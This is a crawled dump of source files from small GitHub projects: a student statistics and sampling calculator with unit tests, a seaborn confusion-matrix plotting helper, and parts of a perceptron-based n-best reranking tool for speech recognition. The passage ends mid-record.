"path": "/PopulationSamplingfunctions/Margin_error.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "from Statistics.Standarddeviation import Standarddeviation\r\nfrom Statistics.Zscore import Zscore\r\n\r\n\r\nclass MarginError:\r\n @staticmethod\r\n def margin(data):\r\n zs = Zscore.zscore(data)\r\n sd = Standarddeviation.standarddeviation(data)\r\n margin = zs * sd\r\n return margin\r\n"
},
{
"alpha_fraction": 0.6000000238418579,
"alphanum_fraction": 0.6037036776542664,
"avg_line_length": 26,
"blob_id": "925c0a7b0ae7135f6b3fd85e1677278c4e7c1009",
"content_id": "705dab78dbae814ccad93493b29d1bb24a34ce3e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 270,
"license_type": "no_license",
"max_line_length": 43,
"num_lines": 10,
"path": "/Statistics/Meandeviation.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "\nfrom Statistics.Mean import Mean\n\nclass Meandeviation():\n @staticmethod\n def meandeviation(array):\n mean = Mean.mean(array)\n numerator = 0\n for elem in array:\n numerator += abs((elem - mean))\n return (numerator / len(array))"
},
{
"alpha_fraction": 0.6032934188842773,
"alphanum_fraction": 0.6092814207077026,
"avg_line_length": 30.809524536132812,
"blob_id": "c05a88ac0b1902854d31ff79bb8de92462f05285",
"content_id": "a2a38472a60a0afe515abc238611a28e9563e739",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 668,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 21,
"path": "/Statistics/PopulationCorrelation.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import math\nfrom Statistics.Standarddeviation import Standarddeviation\nfrom Statistics.Mean import Mean\n\n\nclass PopulationCorrelation:\n @staticmethod\n def populationcorrelation(array):\n x = array[0]\n y = array[1]\n meanX = Mean.mean(x)\n meanY = Mean.mean(y)\n numerator = 0\n for index in range(len(x)):\n xdiff = (x[index] - meanX)\n ydiff = (y[index] - meanY)\n numerator += (xdiff * ydiff)\n covariance = (numerator / (len(x)) - 1)\n stdX = Standarddeviation.standarddeviation(x)\n stdY = Standarddeviation.standarddeviation(y)\n return (covariance / (stdX * stdY))\n"
},
{
"alpha_fraction": 0.511984646320343,
"alphanum_fraction": 0.6519654989242554,
"avg_line_length": 32.64516067504883,
"blob_id": "b24f827145db474eca35fc37ba0d7dc16da503cc",
"content_id": "6d4c38239b666498bde74d9971a5afa9594fcac5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1043,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 31,
"path": "/Tests/test_Random.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom Random.Elements import Elements\nfrom Random.Lists import Lists\nfrom Random.Numbers import Numbers\n\nclass MyTestCase(unittest.TestCase):\n def test_Random_Integer_Seed(self):\n self.assertEqual(9, Numbers.prandINT(1, 10, 30))\n\n def test_Random_Float_Seed(self):\n self.assertEqual(5.851734081452295, Numbers.prandFLT(1, 10, 30))\n\n def test_Random_IntegerList_Seed(self):\n self.assertEqual([9, 5, 1, 4, 5], Lists.prandINTL(1, 10, 5, 30))\n\n def test_Random_FloatList_Seed(self):\n self.assertEqual(\n [5.851734081452295, 3.6027679927574847, 1.2703321769601437, 6.882721785034857, 2.89007825994758]\n , Lists.prandFLTL(1, 10, 5, 30))\n\n def test_Random_Selection_Seed(self):\n arr = [1, 2, 3, 4, 5]\n self.assertEqual(5, Elements.prandElem(arr, 30))\n\n def test_Random_Multiple_Selection_Seed(self):\n arr = [1, 2, 3, 4, 5]\n self.assertEqual([5, 3, 5, 1, 5], Elements.prandElems(arr, 5, 30))\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.5836910009384155,
"alphanum_fraction": 0.5836910009384155,
"avg_line_length": 23.526315689086914,
"blob_id": "fceaed391e743b668907660bd27bed5142dee007",
"content_id": "93cae089306624236b15bfcee1bd0966b65eb6c2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 466,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 19,
"path": "/Random/Lists.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import random\n\n\nclass Lists:\n @staticmethod\n def prandINTL(lowest, highest, n, seed):\n result = []\n random.seed(seed)\n for i in range(n):\n result.append(random.randrange(lowest, highest))\n return result\n\n @staticmethod\n def prandFLTL(lowest, highest, n, seed):\n result = []\n random.seed(seed)\n for i in range(n):\n result.append(random.uniform(lowest, highest))\n return result\n"
},
{
"alpha_fraction": 0.6242774724960327,
"alphanum_fraction": 0.6358381509780884,
"avg_line_length": 27.66666603088379,
"blob_id": "9387154965b1e51df461700409e1e872af11d8bf",
"content_id": "7299689b63407510d2d429772f051993d573719a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 173,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 6,
"path": "/Statistics/PopulationProportion.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "\n\nclass PopulationProportion:\n @staticmethod\n def proportion(data):\n subData = data\n proportion = len(subData)/(len(data) - 10)\n return proportion"
},
{
"alpha_fraction": 0.5364963412284851,
"alphanum_fraction": 0.5510948896408081,
"avg_line_length": 22.909090042114258,
"blob_id": "3afbcf5d97b5fe20381b0912b57441ccb7877ea2",
"content_id": "dd9d76c576bb04c37c3106a9131b03bcf1a59c13",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 274,
"license_type": "no_license",
"max_line_length": 72,
"num_lines": 11,
"path": "/PopulationSamplingfunctions/Random_sampling.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "from Random.Numbers import Numbers\r\n\r\n\r\nclass RandomSample:\r\n @staticmethod\r\n def simpleSample(array, n):\r\n result = []\r\n while n >= 0:\r\n result.append(array.pop(Numbers.randINT(0, len(array) - 1)))\r\n n -= 1\r\n return result\r\n"
},
{
"alpha_fraction": 0.6187151074409485,
"alphanum_fraction": 0.6256983280181885,
"avg_line_length": 23.689655303955078,
"blob_id": "d11548fa009f62043da4d962fde259b09f9a992b",
"content_id": "fb47e2236d5e5aff377e3cf1b4c90b440bf2295e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 716,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 29,
"path": "/PopulationSamplingfunctions/Sample_size.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "from Statistics.Zscore import Zscore\nfrom PopulationSamplingfunctions.Margin_error import MarginError\nfrom Statistics.Standarddeviation import Standarddeviation\n\n\nclass SampleSize:\n @staticmethod\n def unknown_pop_sample(data, percent):\n z_s = Zscore.zscore(data)\n m_e = MarginError.margin(data)\n p = percent\n q = 1 - p\n\n val = z_s / m_e\n samplePop = val**(0.5) * p * q\n\n return samplePop\n\n @staticmethod\n def known_pop_sample(data):\n z_s = Zscore.zscore(data)\n m_e = MarginError.margin(data)\n s_d = Standarddeviation.standarddeviation(data)\n\n value = (z_s * s_d) / m_e\n\n popSample = value**0.5\n\n return popSample\n"
},
{
"alpha_fraction": 0.7176656126976013,
"alphanum_fraction": 0.7182965278625488,
"avg_line_length": 30.386138916015625,
"blob_id": "446c26c5c89122f7640ba9eeafe6087ffe0124a8",
"content_id": "240017a0bdc231f4bbb4d52a75d58b826b9b10cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3170,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 101,
"path": "/Calculator/StatisticsCalculator.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import PopulationSamplingfunctions\nfrom Statistics.Mean import Mean\nfrom Statistics.Median import Median\nfrom Statistics.Mode import Mode\nfrom Statistics.Quartiles import Quartiles\nfrom Statistics.Skewness import Skewness\nfrom Statistics.Standarddeviation import Standarddeviation\nfrom Statistics.Variance import Variance\nfrom Statistics.PopulationCorrelation import PopulationCorrelation\nfrom Statistics.SampleCorrelation import Samplecorrelation\nfrom Statistics.Zscore import Zscore\nfrom Statistics.Meandeviation import Meandeviation\nfrom PopulationSamplingfunctions.Confidence_interval import ConfidenceInterval\nfrom PopulationSamplingfunctions.Crochran import Cochran\nfrom PopulationSamplingfunctions.Margin_error import MarginError\nfrom PopulationSamplingfunctions.Random_sampling import RandomSample\nfrom PopulationSamplingfunctions.Systematic_sampling import SystemicSample\nfrom PopulationSamplingfunctions.Sample_size import SampleSize\n\n\nclass StatsCalculator:\n Result = 0\n\n def __init__(self):\n pass\n\n def Mean(self, a):\n self.Result = Mean.mean(a)\n return self.Result\n\n def Median(self, a):\n self.Result = Median.median(a)\n return self.Result\n\n def Mode(self, a):\n self.Result = Mode.mode(a)\n return self.Result\n\n def Variance(self, a):\n self.Result = Variance.variance(a)\n return self.Result\n\n def Standarddeviation(self, a):\n self.Result = Standarddeviation.standarddeviation(a)\n return self.Result\n\n def Quartiles(self, a):\n self.Result = Quartiles.quartiles(a)\n return self.Result\n\n def Skewness(self, a):\n self.Result = Skewness.skewness(a)\n return self.Result\n\n def SampleCorrelation(self, a):\n self.Result = SampleCorrelation.samplecorrelation(a)\n return self.Result\n\n def PopulationCorrelation(self, a):\n self.Result = PopulationCorrelation.populationcorrelation(a)\n return self.Result\n\n def ZScore(self, a):\n self.Result = Zscore.zscore(a)\n return self.Result\n\n def MeanAbsoluteDeviation(self, a):\n self.Result = Meandeviation.meandeviation(a)\n return self.Result\n\n def SimpleRandomSampling(self, a, b, c):\n self.Result = RandomSample.simpleSample(b, a)\n return self.Result\n\n def SystemicSampling(self, a):\n self.Result = SystemicSample.systematicSample(a, 5)\n return self.Result\n\n def ConfidenceIntervalPopulation(self, a, b):\n self.Result = ConfidenceInterval.confidenceIntervalPopulation(b, a)\n return self.Result\n\n def ConfidenceIntervalSample(self, a, b):\n self.Result = ConfidenceInterval.confidenceIntervalSample(b, a)\n return self.Result\n\n def MarginError(self, a):\n self.Result = MarginError.margin(a)\n return self.Result\n\n def Cochran(self, a):\n self.Result = Cochran.cochran(a)\n return self.Result\n\n def SampleSizeUnknown(self, a, b):\n self.Result = SampleSize.unknown_pop_sample(a, b)\n return self.Result\n\n def SampleSizeKnown(self, a):\n self.Result = SampleSize.known_pop_sample(a)\n return self.Result\n"
},
{
"alpha_fraction": 0.6857143044471741,
"alphanum_fraction": 0.6857143044471741,
"avg_line_length": 16.66666603088379,
"blob_id": "ed142ef0b7ed94e1048b6217139b29e27890edca",
"content_id": "13c273829e8955595a13ffbc9867776632841069",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 105,
"license_type": "no_license",
"max_line_length": 36,
"num_lines": 6,
"path": "/Statistics/Mode.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import statistics\n\nclass Mode:\n @staticmethod\n def mode(data):\n return statistics.mode(data)"
},
{
"alpha_fraction": 0.6746002435684204,
"alphanum_fraction": 0.7288954854011536,
"avg_line_length": 33.92207717895508,
"blob_id": "6396013af4e1cfd1787aaf4538f4a6ff6da5f84e",
"content_id": "b0ec865e1e5a631025d24afb2e84ecdea636e561",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2689,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 77,
"path": "/Tests/test_Calculator.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import unittest\nfrom numpy.random import seed\nfrom numpy.random import randint\n\nfrom Statistics.Skewness import Skewness\nfrom Statistics.Median import Median\nfrom Statistics.Variance import Variance\nfrom Statistics.Standarddeviation import Standarddeviation\nfrom Statistics.Zscore import Zscore\nfrom Statistics.Meandeviation import Meandeviation\nfrom Statistics.Quartiles import Quartiles\nfrom Statistics.SampleCorrelation import Samplecorrelation\nfrom Statistics.PopulationCorrelation import PopulationCorrelation\nfrom Statistics.Statistics import Statistics\nfrom Statistics.Mode import Mode\nfrom Statistics.Mean import Mean\n\n\nclass MyTestCase(unittest.TestCase):\n def setUp(self) -> None:\n seed(5)\n self.testData = randint(10, 20, 30)\n self.testDataTwo = randint(10, 20, 30)\n self.statistics = Statistics()\n\n def test_instantiate_calculator(self):\n self.assertIsInstance(self.statistics, Statistics)\n\n def test_mean_calculator(self):\n mean = Mean.mean(self.testData)\n self.assertEqual(mean, 14.233333333333333)\n\n def test_median_calculator(self):\n median = Median.median(self.testData)\n self.assertEqual(median, 14.5 )\n\n def test_mode_calculator(self):\n mode = Mode.mode(self.testData)\n self.assertEqual(mode, 10)\n\n def test_variance_calculator(self):\n variance = Variance.variance(self.testData)\n self.assertEqual(variance, 11)\n\n def test_skewness_calculator(self):\n skew = Skewness.skewness(self.testData)\n self.assertEqual(skew, 0.03576490724804414)\n\n def test_standarddeviation_calculator(self):\n standard = Standarddeviation.standarddeviation(self.testData)\n self.assertEqual(standard, 3.3166247903554)\n\n def test_quartiles_calculator(self):\n quart = Quartiles.quartiles(self.testData)\n self.assertEqual(quart, (11.0, 14.5, 17.0))\n\n def test_zscore_calculator(self):\n zscore = Zscore.zscore(self.testData)\n self.assertEqual(zscore[0], -0.36778161169611)\n\n def test_meandeviation_calculator(self):\n meand = Meandeviation.meandeviation(self.testData)\n self.assertEqual(meand, 3.033333333333333)\n\n def test_samplecorrelation_calculator(self):\n newData = [self.testData, self.testDataTwo]\n samplec = Samplecorrelation.samplecorrelation(newData)\n self.assertEqual(samplec, 0.36163489596525095)\n\n def test_populationcorrelation_calculator(self):\n newData = [self.testData, self.testDataTwo]\n popc = PopulationCorrelation.populationcorrelation(newData)\n self.assertEqual(popc, 0.24767431950561303)\n\n\nif __name__ == '__main__':\n unittest.main()\n"
},
{
"alpha_fraction": 0.7388059496879578,
"alphanum_fraction": 0.7388059496879578,
"avg_line_length": 18.14285659790039,
"blob_id": "5f7e93a138c67d2ac3514b16814eba30964b69cf",
"content_id": "11a8b37fc469f28c0880171fbc24a6f15f11ad69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 134,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 7,
"path": "/Statistics/Standarddeviation.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import statistics\n\n\nclass Standarddeviation:\n @staticmethod\n def standarddeviation(data):\n return statistics.stdev(data)\n"
},
{
"alpha_fraction": 0.5469613075256348,
"alphanum_fraction": 0.5524861812591553,
"avg_line_length": 17.100000381469727,
"blob_id": "2bb08de8cd70630d1c7f0d8290cc3525cbc6feb9",
"content_id": "4039b5b4e2b95b96fb699adf98b78c91fd63135c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 181,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 10,
"path": "/Statistics/Mean.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import statistics\n\n\nclass Mean:\n @staticmethod\n def mean(array):\n total = 0\n for num in array:\n total = total + num\n return total / len(array)\n"
},
{
"alpha_fraction": 0.5725551843643188,
"alphanum_fraction": 0.578864336013794,
"avg_line_length": 22.518518447875977,
"blob_id": "dc3ab1ca77e9dc27220c79b2d386aa6d879ecf1c",
"content_id": "500a089cce90e5c8709250d5efda196d00951221",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 634,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 27,
"path": "/Random/Elements.py",
"repo_name": "Duttp1998/IS218Project",
"src_encoding": "UTF-8",
"text": "import random\n\n\nclass Elements:\n @staticmethod\n def randElem(arr):\n return arr[random.randrange(0, len(arr))]\n\n @staticmethod\n def prandElem(arr, seed):\n random.seed(seed)\n return arr[random.randrange(0, len(arr))]\n\n @staticmethod\n def randElems(arr, n):\n result = []\n for i in range(n):\n result.append(arr[random.randrange(0, len(arr))])\n return result\n\n @staticmethod\n def prandElems(arr, n, seed):\n random.seed(seed)\n result = []\n for i in range(n):\n result.append(arr[random.randrange(0, len(arr))])\n return result"
}
] | 24 |
sspleo/DS_toolbox
|
https://github.com/sspleo/DS_toolbox
|
cf529862bf974ed2bdea20262e28cf242dbdbccb
|
7176611d2c481914bfb0fe4da37b53888642ae61
|
57160c09075c72f9106d3cdf12cf3ba407418dac
|
refs/heads/main
| 2023-02-28T12:29:08.267394 | 2021-02-04T05:01:20 | 2021-02-04T05:01:20 | 335,838,957 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5684864521026611,
"alphanum_fraction": 0.5962733030319214,
"avg_line_length": 34.569766998291016,
"blob_id": "3e8d43979ae64c95b315843c3bc4776771212a0b",
"content_id": "b18406460176ac4ff5cba34fb888909999bdc5cf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3059,
"license_type": "permissive",
"max_line_length": 170,
"num_lines": 86,
"path": "/heatmap_confusion_matrix.py",
"repo_name": "sspleo/DS_toolbox",
"src_encoding": "UTF-8",
"text": "import matplotlib.pyplot as plt\nfrom pandas import DataFrame as df\nfrom pandas_confusion import BinaryConfusionMatrix\nfrom seaborn import heatmap\n\ndef heatmap_confusion_matrix(actual_label, pred_label, output_folder, plot_title):\n \"\"\" Plot Confusion Matrix using Seaborn's Heatmap.\n \n This plot contains not just confusion matrix but also\n Accuracy, TPR(Recall, Sensitivity), Precision, TNR(specificity) and F1-Score\n Columns are predicted labels and Rows are actual labels\n \n Parameters\n ----------\n actual_label : 1D array\n actual labels of the data\n pred_label : 1D array\n predicted labels\n output_folder : path\n path to output folder where output plot will be saved\n plot_title : string\n plot title which may conclude data information and model description\n \n Returns\n -------\n result : Confusion matrix plot with test result statistics\n Saved plot file to output_folder\n \"\"\"\n # Create confusion matrix\n binary_confusion_matrix = BinaryConfusionMatrix(actual_label, pred_label)\n \n # Result statistics from the confusion matrix\n stats = binary_confusion_matrix.stats()\n pos_real = stats['P']\n neg_real = stats['N']\n pos_pred = stats['PositiveTest']\n neg_pred = stats['NegativeTest']\n TP = stats['TP']\n TN = stats['TN']\n FP = stats['FP']\n FN = stats['FN']\n TPR = round(stats['TPR'], 2) #sensitivity, recall: TP/(TP+FN) = TP/pos_real\n TNR = round(stats['TNR'], 2) #specificity\n PPV = round(stats['PPV'], 2) #precision : TP/(TP+FP) = TP/pos_pred\n F1_score = round(stats['F1_score'], 2) #harmonic mean of recall and precision\n ACC = round(stats['ACC'], 2)\n \n # Confusion matrix for display\n cm = np.array([[TN,FP], [FN,TP]])\n \"\"\"\n TN FP\n FN TP\n \"\"\"\n df_cm = df(cm, index = ['{} \\nDecoy'.format(neg_real), '%d \\nActive'%(pos_real)], columns = ['Decoy\\n%d'%(neg_pred), 'Active\\n%d'%(pos_pred)])\n plot = plt.figure(figsize = (6, 6))\n plt.rcParams['font.size'] = 10\n plt.title(\"Accuracy : {:.2f} TPR : {:.2f}\\nPrecision : {:.2f} TNR : {:.2f} F1-Score : {:.2f}\".format(ACC, TPR, PPV, TNR, F1_score), loc = 'left', fontsize = 12)\n plt.suptitle(plot_title, y = 0.95, fontsize= 14)\n plt.xlabel('Predicted Label')\n plt.ylabel('Actual Label')\n plt.subplots_adjust(top = 0.8)\n \n # plot heatmap\n heatmap(df_cm, annot = True, fmt = 'd', annot_kws={\"size\":14})\n \n # save plot and display it\n plot.savefig('{}/test_result_confusion_matrix.png'.format(output_folder))\n plt.show()\n plt.close()\n\n\n\"\"\"\nExamples\n--------\n>>>> import numpy as np\n>>>> import os\n>>>> reals = np.array([1,1,1,1,1,1,1,1,1,1, #10\n 0,0,0,0,0,0,0,0,0, #9\n 0,0, #2\n 1,1,1]) #3\n>>>> predicts = np.array([1,1,1,1,1,1,1,1,1,1,\n 0,0,0,0,0,0,0,0,0,\n 1,1,\n 0,0,0])\n>>>> heatmap_confusion_matrix(reals, predicts, os.getcwd(), 'Heatmap Confusion Matrix Sample')\n\"\"\"\n"
},
{
"alpha_fraction": 0.8029196858406067,
"alphanum_fraction": 0.8029196858406067,
"avg_line_length": 67.5,
"blob_id": "eec1758835eec34bc6844071e037b582cfcf8b9f",
"content_id": "d5a935a246cb9589966f347201d23a9fb03c31f9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 137,
"license_type": "permissive",
"max_line_length": 123,
"num_lines": 2,
"path": "/README.md",
"repo_name": "sspleo/DS_toolbox",
"src_encoding": "UTF-8",
"text": "# DS_toolbox\nA clump of nothing which takes space on your device, but possibly would be helpful for somebody interested in Data Science.\n"
}
] | 2 |
Maksymdelta/semlm
|
https://github.com/Maksymdelta/semlm
|
d45d076449372fd93c10d99b31de0fb0398f1a45
|
b3fdc1bdb3942d0dc202bdc37d783bb19c518368
|
af6a729571f46a06364c4ff1dd78498761da088a
|
refs/heads/master
| 2021-01-11T10:27:23.945364 | 2017-01-09T03:19:06 | 2017-01-09T03:19:06 | 79,100,625 | 1 | 0 | null | 2017-01-16T09:02:40 | 2016-07-11T05:34:27 | 2017-01-09T03:19:08 | null |
[
{
"alpha_fraction": 0.6337562203407288,
"alphanum_fraction": 0.6373414397239685,
"avg_line_length": 37.553192138671875,
"blob_id": "fc5b3d9641ed27eb350a5b7924b63e50527dd6ae",
"content_id": "dcde1a75dba621f414760b7ec40cc80d42c8f638",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7252,
"license_type": "no_license",
"max_line_length": 132,
"num_lines": 188,
"path": "/bin/new-perceptron.py",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\n\"\"\"\nGiven some nbest lists and a reference...\n\n - Split the nbests into a train and test set.\n - Create PRO train and test sets.\n - Vectorize everything into numeric features.\n - Train an sk-learn model, and print pairwise accuracy.\n - Create a WSLM.\n\"\"\"\n\n# Let's factor stuff out of this file to clean it up.\n\nimport argparse\nimport colorama\nimport logging\nimport pickle\nimport cProfile, pstats, io\n\nimport numpy as np\n\nfrom timeit import default_timer as timer\n\nfrom sklearn.feature_extraction import DictVectorizer\n\nfrom asr_tools.kaldi import read_nbest_file\nfrom asr_tools.evaluation_util import set_global_references\nfrom asr_tools.nbest_util import evaluate_nbests, evaluate_nbests_oracle\nfrom asr_tools.reranking import rerank_nbests\nfrom asr_tools.util import Timer\n\nfrom semlm.feature_extractor import UnigramFE, BigramFE, CompoundFE, TrigramFE\nfrom semlm.model import WSLM\n\n# These are doing the hard work...\nfrom semlm.pro import nbest_pairs, nbest_pairs_random, nbest_hyp_best_pairs\nfrom semlm.perceptron import perceptron\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument('nbest_file')\n parser.add_argument('ref_file', type=argparse.FileType('r'))\n # What does this mean? It's the data?\n pickle_group = parser.add_mutually_exclusive_group()\n pickle_group.add_argument('--load-pickle', action='store_true', default=False)\n pickle_group.add_argument('--save-pickle', action='store_true', default=False)\n parser.add_argument('-n', '--nbest_sample_size', type=int, default=100)\n parser.add_argument('-e', '--epochs', type=int, default=5)\n parser.add_argument('-r', '--learning-rate', type=float, default=0.01)\n parser.add_argument('-s', '--selection-mode', choices=['all', 'random', 'hyp_best'])\n parser.add_argument('-f', '--print-features', action='store_true', default=False)\n return parser.parse_args()\n\ndef print_data_info(vec, train_data, test_data):\n print('Vocab sample: {}'.format(vec.feature_names_[:10]))\n print('Params object: {}'.format(vec.get_params()))\n print('Feature representation: {}'.format(type(train_data).__name__))\n print('Feature representation: {}'.format(type(test_data).__name__))\n print('Train feature array dim: {dim[0]} x {dim[1]}'.format(dim=train_data.shape))\n print('Test feature array dim: {dim[0]} x {dim[1]}'.format(dim=test_data.shape))\n\ndef feature_extract_sents(sentences):\n \"\"\"Run feature extraction on the given set of sentences.\"\"\"\n fe = UnigramFE()\n feat_dict_list = []\n for sent in sentences:\n feats = fe.extract(sent)\n sent.features = feats\n feat_dict_list.add(feats)\n vec = DictVectorizer()\n vec.fit(feat_dict_list)\n for sent in sentences:\n sent.fv = vec.transform(sent.features)\n\ndef print_evaluation(train_nbests, test_nbests):\n print('TRAIN: ' + str(evaluate_nbests(train_nbests)))\n print('TEST: ' + str(evaluate_nbests(test_nbests)))\n \ndef main():\n args = parse_args()\n colorama.init()\n set_global_references(args.ref_file)\n\n if args.load_pickle:\n with Timer('Reading n-bests from pickle'):\n with open(args.nbest_file, 'rb') as f:\n nbests = pickle.load(f)\n else:\n with open(args.nbest_file, 'r') as f:\n with Timer('Reading n-bests from text'):\n nbests = list(read_nbest_file(f))\n with Timer('Evaluating n-bests'):\n evaluate_nbests(nbests)\n if args.save_pickle:\n with open(args.nbest_file + '.pickle', 'wb') as f:\n with Timer('Saving data as pickle'):\n pickle.dump(nbests, f)\n\n for nbest in nbests:\n nbest.crop(20)\n \n train_nbests = nbests[0:len(nbests) // 2]\n test_nbests = nbests[len(nbests) // 2:] \n \n # Do feature extraction. Need a better abstraction for feature extraction I think.\n # Should be able to do something like extract_features(s1)\n fe = CompoundFE([UnigramFE(), BigramFE(), TrigramFE()])\n feature_dict = {}\n feature_start = timer()\n with Timer('Extracting features'):\n for nbest in train_nbests:\n for sentence in nbest.sentences:\n feature_dict.update(fe.extract(sentence))\n fe.fix(feature_dict)\n # Now that we have a feature vectorizer, we can extract feature IDs. This gives the sentence its IDs.\n with Timer('Vectorizing features'):\n for nbest in nbests:\n for sentence in nbest.sentences:\n feature_ids = fe.extract_ids(sentence)\n sentence.feature_vector = feature_ids\n\n # Need an initial set of weights and initial model\n with Timer('Initializing model'):\n params = np.zeros((1, fe.size()))\n model = WSLM(fe.vec, fe, params)\n\n # print()\n # print('Training/test/total nbests: {}/{}/{}'.format(len(train_nbests),\n # len(test_nbests),\n # len(nbests)))\n # print_evaluation(train_nbests, test_nbests)\n # print('Training oracle:')\n # print(evaluate_nbests_oracle(train_nbests))\n # print('Test oracle:')\n # print(evaluate_nbests_oracle(test_nbests))\n\n # Do an initial scoring and re-ranking\n func = lambda x: model.score(x)\n # The re-ranking ops appear that they are destructive\n rerank_nbests(train_nbests, func)\n rerank_nbests(test_nbests, func) \n print('INITIAL EVAL:')\n print_evaluation(train_nbests, test_nbests)\n\n print('=======')\n print('Beginning training...')\n train_start = timer()\n for e in range(args.epochs):\n print('Epoch: {}'.format(e+1))\n # Creates an iterator of pairs...\n # Some of these will have to be reranked for the next iteration to do anything\n if args.selection_mode == 'all':\n pair_iter = nbest_pairs(train_nbests)\n elif args.selection_mode == 'random':\n pair_iter = nbest_pairs_random(train_nbests, args.nbest_sample_size)\n elif args.selection_mode == 'hyp_best':\n pair_iter = nbest_hyp_best_pairs(train_nbests)\n else:\n raise Exception('Unknown selection method: {}'.format(args.selection_mode))\n perceptron(pair_iter, model, rate=args.learning_rate)\n print('Re-ranking n-best lists...')\n func = lambda x: model.score(x) # Spending most of our time in here. have to call it n*log(n) times to score each n-best\n # The re-ranking ops appear that they are destructive\n rerank_nbests(train_nbests, func)\n rerank_nbests(test_nbests, func)\n print_evaluation(train_nbests, test_nbests)\n print('=======')\n\n train_end = timer()\n print('Training: {:.3f} seconds'.format(train_end - train_start))\n\n # Do a final scoring and re-ranking\n func = lambda x: model.score(x)\n # The re-ranking ops appear that they are destructive\n rerank_nbests(train_nbests, func)\n rerank_nbests(test_nbests, func)\n\n print('=======')\n print('FINAL EVAL:')\n print_evaluation(train_nbests, test_nbests)\n \n if args.print_features:\n model.print_feature_weights(max=100)\n\n \nif __name__ == \"__main__\":\n main()\n\n\n\n\n"
},
{
"alpha_fraction": 0.6236044764518738,
"alphanum_fraction": 0.6236044764518738,
"avg_line_length": 33.83333206176758,
"blob_id": "af6395a1539e6c9b50cf184c49f0d387b1aa6c91",
"content_id": "0b58cc7166b9dd78cedf5bb2b6d423cf27855d9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 627,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 18,
"path": "/semlm/example.py",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
"text": "\"\"\"\nRepresents an 'example' a very generic object with a class and features,\nfor level machine learning purposes.\n\"\"\"\n\nclass Example(object):\n \"\"\"Represents an 'example' a very generic object with a class and features,\n for level machine learning purposes.\"\"\"\n\n def __init__(self, class_, features):\n \"\"\"Must initialize with a class and features.\"\"\"\n self.class_ = class_\n self.features = features\n\n def __unicode__(self):\n \"\"\"Print the class and features readably.\"\"\"\n str_ = ['<', 'class:', str(self.class_), 'features:' + str(self.features), '>']\n return ' '.join(str_)\n"
},
{
"alpha_fraction": 0.5932896733283997,
"alphanum_fraction": 0.621931254863739,
"avg_line_length": 32.94444274902344,
"blob_id": "1eb9217ac2f6c873624e61d69b1f380edef78845",
"content_id": "ace86679dd1710a555025247f7849896d49328c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1222,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 36,
"path": "/semlm/perceptron.py",
"repo_name": "Maksymdelta/semlm",
"src_encoding": "UTF-8",
